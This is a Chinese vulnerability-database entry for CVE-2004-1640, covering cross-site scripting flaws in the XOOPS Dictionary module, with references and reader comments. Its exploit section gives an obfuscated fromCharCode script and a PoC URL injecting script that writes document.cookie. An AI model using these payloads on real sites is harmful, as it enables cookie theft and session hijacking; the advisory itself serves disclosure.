Nagl XOOPS Dictionary模块多个跨站脚本漏洞
漏洞ID |
1108147 |
漏洞类型 |
跨站脚本 |
发布时间 |
2004-08-28 |
更新时间 |
2005-10-20 |
CVE编号
|
CVE-2004-1640
|
CNNVD-ID
|
CNNVD-200408-225 |
漏洞平台 |
PHP |
CVSS评分 |
4.3
|
|漏洞详情
XOOPS0.94和1.0版本存在多个跨站脚本漏洞。远程攻击者借助(1)search.php的terme参数或者(2)letter.php的letter参数执行任意web脚本和HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/11064/info
Reportedly the XOOPS Dictionary Module by Nagle is affected by multiple cross-site scripting vulnerabilities. This issue is due to a failure of the application to properly sanitize user-supplied URI input.
As a result of this issue and attacker can execute arbitrary script code in the browser of an unsuspecting user by enticing the unsuspecting user to follow a malicious link.
An attacker can leverage this issue to steal cookie based authentication credentials as well as carry out other attacks. It should be noted that the impact of this issue depends on the context of the dynamic web site developed with the XOOPS software and the XOOPS dictionary module and so cannot accurately be outlined here.
script>
function xss (){
var tag=String.fromCharCode(60)+String.fromCharCode(105)+
String.fromCharCode(109)+String.fromCharCode(103)+String.fromCharCode(32)+
String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+
String.fromCharCode(32)+String.fromCharCode(61);
var web=String.fromCharCode(104)+String.fromCharCode(116)+
String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+
String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(119)+
String.fromCharCode(119)+String.fromCharCode(119)+String.fromCharCode(46)+
String.fromCharCode(103)+String.fromCharCode(111)+String.fromCharCode(111)+
String.fromCharCode(103)+String.fromCharCode(108)+String.fromCharCode(101)+
String.fromCharCode(46)+String.fromCharCode(99)+String.fromCharCode(111)+
String.fromCharCode(109);
var path=String.fromCharCode(47)+String.fromCharCode(105)+
String.fromCharCode(109)+String.fromCharCode(97)+String.fromCharCode(103)+
String.fromCharCode(101)+String.fromCharCode(115)+String.fromCharCode(47)+
String.fromCharCode(103)+String.fromCharCode(111)+String.fromCharCode(111)+
String.fromCharCode(103)+String.fromCharCode(108)+String.fromCharCode(101)+
String.fromCharCode(95)+String.fromCharCode(56)+String.fromCharCode(48)+
String.fromCharCode(119)+String.fromCharCode(104)+String.fromCharCode(116)+
String.fromCharCode(46)+String.fromCharCode(103)+String.fromCharCode(105)+
String.fromCharCode(102)+String.fromCharCode(62);
document.write(tag+web+path);
} xss()
</script>
The following proof of concept has been provided for the 'letter.php' script issue:
ttp://attaker/modules/dictionary/letter.php?letter="><script>document.write(document.cookie)<script>(
|参考资料
来源:XF
名称:xoops-dictionary-letter-xss(17154)
链接:http://xforce.iss.net/xforce/xfdb/17154
来源:BID
名称:11064
链接:http://www.securityfocus.com/bid/11064
来源:SECUNIA
名称:12424
链接:http://secunia.com/advisories/12424
来源:BUGTRAQ
名称:20040828CrossSiteScriptinginXOOPSVersion2.xDictionarymodule
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=109394077209963&w;=2
来源:XF
名称:xoops-dictionary-search-xss(17152)
链接:http://xforce.iss.net/xforce/xfdb/17152
来源:OSVDB
名称:9394
链接:http://www.osvdb.org/9394
来源:OSVDB
名称:9393
链接:http://www.osvdb.org/9393
来源:cyruxnet.org
链接:http://cyruxnet.org/modulo_dic_xoops.htm
相关推荐: Cisco VPN 5000 Concentrator Plaintext Password
Cisco VPN 5000 Concentrator Plaintext Password 漏洞ID 1101666 漏洞类型 Design Error 发布时间 2002-08-07 更新时间 2002-08-07 CVE编号 N/A CNNVD-ID N…
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666